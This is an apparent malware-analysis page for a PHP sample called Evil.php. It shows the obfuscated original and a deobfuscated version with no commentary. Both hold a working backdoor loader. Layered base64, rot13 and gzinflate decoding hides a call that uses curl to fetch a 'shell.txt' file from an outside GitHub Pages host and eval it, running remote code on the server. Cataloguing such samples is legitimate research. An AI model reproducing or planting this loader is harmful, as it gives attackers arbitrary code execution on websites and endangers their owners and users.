PHP Malware Analysis

Back to list

Filename: Evil.php

Tags


Deobfuscated code

<?php

$et = 'jUjbZaJAEP0Vy7LKsFhjc7iX5VASiU5wb0mNmpctICgqCihlMeW/L5BOh11F2beZmj6nQp/uhtrSaPYSB02V6mHALPtDFKwrXXuagiE3rrz8SWFJI9s31/IjQmiN1/h6sT+00d31ffP4y2yXYXvhpDNqf1GB+lnP2M3PrddrqDb3luYuAl2r2IZ28oC9qrmupSEE6U1gSzvEZGd64YcWJ1bUh7lbS6ZJqdeZPIpWzzgwO+PY5Nw81dahvpIBW3Zd2GQRH7xnos8XTj4x5wsrEC/JhXfWNqGrAUkq406AgJKcvFU8gBNdrydRZKzvESwVhFECnLASGuRHg6b7HhDEMqiUsl/iIVnj92Zwzgrct7UXRRWMVRQlPERr2AFJ+EllAiVV+RQ6P9o6hKjSypF0BtyYWTY2l6LPr9glOq859e7yigvLsEsclSTzaMNgxdIeFeslUoNHpq54C0EGcshPRKxn7m/8DqVFACi2AnIJaa5zyuXjw5IJVZm4iXsv4MozFYo6WPPW0QKB0q4LkKTPJzJjnQ3PkYC/U+kzzNIPvszKUdglAWmezo2kZoMo+hKEPcjcwUiRz0tq9owlpVoNPD+C8H+cc7NBGlhYUfDbU5Ibni3XZOH4PPrKBUEuzmwCsNf7OVdUu6QxxQG7nLNoTe7mviTLckAofLWW4ucYHcJLKO8tGVwYDJghnWh5ZU+pjSL4T3pJc3UfDFYg1Z4JY3jo3PTCkibupQZvW4nlxb7RuQ9ZXhWdi6Qopk2fjGH01xfgP7Kq7QxywznGYDrwZ2KsrNyNvpwhFXq7eOCh2JpoldgLa3rbRmev+3d6u9LSUofYGa0sYnwAEzsSMc+m30aW7ritp/yzwfOLqkHeOvD5oQcnUGio3mpv5b79wGqUVb2fDZ7W0848ZY/qxlhlEW3i3VUNpwMl3A4isd/rH5yBr916OHoWKGm/agOdZNu4XbVN9Srz78oj8nSDinDMCcSH8ypfO214mls7ZvWU/ONjSphto0RCtqTRmLvGNRTZPw==';
eval /* PHPDeobfuscator eval output */ {
    $vcbf840 = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
    function yprr503($ccun221, $ipue244, $tgju488)
    {
        return '' . $ccun221 . '' . $ipue244 . '' . $tgju488 . '';
    }
    $xjow903 = yprr503($vcbf840[58], "al", $vcbf840[36]);
    $zjcn038 = yprr503("_u", "se", '');
    $llof213 = yprr503($vcbf840[27], $vcbf840[20], $vcbf840[39]);
    $nogd067 = yprr503($vcbf840[8], '', $vcbf840[11]);
    $fsps364 = yprr503($vcbf840[58], $vcbf840[20], "ar");
    $kjhe036 = yprr503($vcbf840[27], $vcbf840[69], $vcbf840[25]);
    $smyo112 = yprr503(yprr503($xjow903, '', $zjcn038), yprr503($llof213, $nogd067, ''), yprr503($fsps364, '', $kjhe036));
    $gopp378 = yprr503($vcbf840[58], $vcbf840[27], $vcbf840[0]);
    $oont490 = yprr503($vcbf840[69], $vcbf840[38], '');
    $lllq180 = yprr503($vcbf840[0], '', $vcbf840[20]);
    $ecnr938 = yprr503($vcbf840[39], $vcbf840[8], $vcbf840[11]);
    $ffdi480 = yprr503($vcbf840[58], $vcbf840[38], '');
    $dxkt204 = yprr503($vcbf840[61], $vcbf840[10], '');
    $icbz544 = yprr503('', $vcbf840[11], '');
    $uohg939 = yprr503(yprr503($gopp378, $oont490, $lllq180), yprr503($ecnr938, '', $ffdi480), yprr503($dxkt204, '', $icbz544));
    $idgk110 = yprr503($vcbf840[0], '', $vcbf840[3]);
    $opvu721 = yprr503($vcbf840[69], $vcbf840[36], $vcbf840[9]);
    $mtbg524 = yprr503('', $vcbf840[49], $vcbf840[69]);
    $yxfs212 = yprr503($vcbf840[57], $vcbf840[0], $vcbf840[7]);
    $vesg899 = yprr503($vcbf840[16], $vcbf840[20], $vcbf840[70]);
    $ehjl604 = yprr503($vcbf840[0], $vcbf840[58], $vcbf840[10]);
    $bxlr460 = yprr503($vcbf840[70], $vcbf840[0], $vcbf840[9]);
    $jyhp869 = yprr503(yprr503($idgk110, $opvu721, ''), yprr503('', '', $mtbg524), yprr503($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwczovL2V2aWx0d2luLWRldi5naXRodWIuaW8vc2hlbGwudHh0Jyk7Y3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTskcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ZXZhbCgnPz4nLiRyZXN1bHQpOw=='" . yprr503("))", '', $vcbf840[46]);
    $smyo112($uohg939, array('', '}' . $jyhp869 . '//'));
    //scp-173
};


Original code

<?php $et = 'jUjbZaJAEP0Vy7LKsFhjc7iX5VASiU5wb0mNmpctICgqCihlMeW/L5BOh11F2beZmj6nQp/uhtrSaPYSB02V6mHALPtDFKwrXXuagiE3rrz8SWFJI9s31/IjQmiN1/h6sT+00d31ffP4y2yXYXvhpDNqf1GB+lnP2M3PrddrqDb3luYuAl2r2IZ28oC9qrmupSEE6U1gSzvEZGd64YcWJ1bUh7lbS6ZJqdeZPIpWzzgwO+PY5Nw81dahvpIBW3Zd2GQRH7xnos8XTj4x5wsrEC/JhXfWNqGrAUkq406AgJKcvFU8gBNdrydRZKzvESwVhFECnLASGuRHg6b7HhDEMqiUsl/iIVnj92Zwzgrct7UXRRWMVRQlPERr2AFJ+EllAiVV+RQ6P9o6hKjSypF0BtyYWTY2l6LPr9glOq859e7yigvLsEsclSTzaMNgxdIeFeslUoNHpq54C0EGcshPRKxn7m/8DqVFACi2AnIJaa5zyuXjw5IJVZm4iXsv4MozFYo6WPPW0QKB0q4LkKTPJzJjnQ3PkYC/U+kzzNIPvszKUdglAWmezo2kZoMo+hKEPcjcwUiRz0tq9owlpVoNPD+C8H+cc7NBGlhYUfDbU5Ibni3XZOH4PPrKBUEuzmwCsNf7OVdUu6QxxQG7nLNoTe7mviTLckAofLWW4ucYHcJLKO8tGVwYDJghnWh5ZU+pjSL4T3pJc3UfDFYg1Z4JY3jo3PTCkibupQZvW4nlxb7RuQ9ZXhWdi6Qopk2fjGH01xfgP7Kq7QxywznGYDrwZ2KsrNyNvpwhFXq7eOCh2JpoldgLa3rbRmev+3d6u9LSUofYGa0sYnwAEzsSMc+m30aW7ritp/yzwfOLqkHeOvD5oQcnUGio3mpv5b79wGqUVb2fDZ7W0848ZY/qxlhlEW3i3VUNpwMl3A4isd/rH5yBr916OHoWKGm/agOdZNu4XbVN9Srz78oj8nSDinDMCcSH8ypfO214mls7ZvWU/ONjSphto0RCtqTRmLvGNRTZPw=='; eval(str_rot13(gzinflate(str_rot13(base64_decode("$et"))))); ?>